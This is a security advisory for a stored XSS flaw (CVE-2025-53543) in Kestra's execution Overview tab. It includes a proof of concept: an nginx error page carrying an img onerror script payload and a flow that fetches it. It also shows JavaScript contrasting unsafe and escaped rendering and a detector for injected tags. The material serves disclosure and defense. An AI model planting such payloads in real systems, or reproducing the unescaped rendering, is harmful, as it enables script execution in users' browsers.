
Stored XSS in Kestra below 0.22

Moderate
tchiotludo published GHSA-qpj4-4r6r-wvf4 Jul 7, 2025

Package

kestra

Affected versions

< 0.22

Patched versions

0.22.0

Description

Summary

The error message shown in the execution "Overview" tab is vulnerable to stored XSS because the body of the HTTP response received by the task is rendered without being neutralized.

PoC

  1. Host a web server that returns a response with any error status code and a JavaScript payload in the body; sample configuration:

nginx config

server {
    listen 80;
    server_name your.domain.com;

    location / {
        return 504;
    }

    error_page 504 /504_custom.html;

    location = /504_custom.html {
        root /var/www/html;
        internal;
    }
}

/var/www/html/504_custom.html

<!DOCTYPE html>
<html>
<head>
    <title>504 Gateway Timeout</title>
</head>
<body>
    <h1>504 Gateway Timeout</h1>
    <img src='#' onerror=alert(location.host) />
</body>
</html>
  2. Create a sample flow that makes an HTTP request to this endpoint:
id: test_xss
namespace: test.test

tasks:
  - id: hello
    type: io.kestra.plugin.core.http.Request
    uri: http://TARGET_PAGE/
  3. Execute the flow. As soon as the execution finishes with an error, navigate to the "Overview" page of that execution.
  4. The page renders the response body and executes the JavaScript it contains in the context of the current Kestra instance.

Impact

Execution of attacker-supplied JavaScript in the browser of a user viewing the execution can result in compromise of the Kestra OSS instance.
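The defect described above, illustrated with added JavaScript that is not Kestra's own code: an error-panel renderer that concatenates the raw response body into markup beside one that escapes it, plus a check that flags stray tags or inline event handlers in rendered output. The sample 504 body and every function name here are constructed for this example.

```javascript
// Constructed sample: the kind of error body the advisory describes.
const SAMPLE_504_BODY = [
  "<!DOCTYPE html>",
  "<html><body>",
  "<h1>504 Gateway Timeout</h1>",
  "<img src='#' onerror=alert(location.host) />",
  "</body></html>",
].join("\n");

// Escape the five characters that matter in text content and in
// double- or single-quoted attribute values.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: the raw body is spliced into markup, which is
// what assigning it to innerHTML or a v-html binding amounts to.
function renderErrorUnsafe(status, body) {
  return `<div class="error"><b>HTTP ${status}</b><pre>${body}</pre></div>`;
}

// Hardened pattern: the body is treated strictly as text (in a live DOM,
// `el.textContent = body`); the string form is the escaped body.
// Truncation keeps a huge upstream response from flooding the panel.
function renderErrorSafe(status, body, maxLen = 4096) {
  const shown = body.length > maxLen ? body.slice(0, maxLen) + "..." : body;
  return `<div class="error"><b>HTTP ${escapeHtml(status)}</b><pre>${escapeHtml(shown)}</pre></div>`;
}

// Review/test check: does the rendered markup contain any tag that is not
// part of our own template, or any inline on*= event handler attribute?
const ALLOWED_TAGS = new Set(["div", "b", "pre", "/div", "/b", "/pre"]);
function containsForeignMarkup(html) {
  for (const m of html.matchAll(/<\s*(\/?\w+)([^>]*)>/g)) {
    if (!ALLOWED_TAGS.has(m[1].toLowerCase())) return true; // foreign element
    if (/\son\w+\s*=/i.test(m[2])) return true;             // event handler
  }
  return false;
}
```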

Severity

Moderate

CVSS overall score


CVSS v3 base metrics

Attack vector
Local
Attack complexity
Low
Privileges required
High
User interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N

CVE ID

CVE-2025-53543

Weaknesses

Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)

The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as <, >, and & that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.

Credits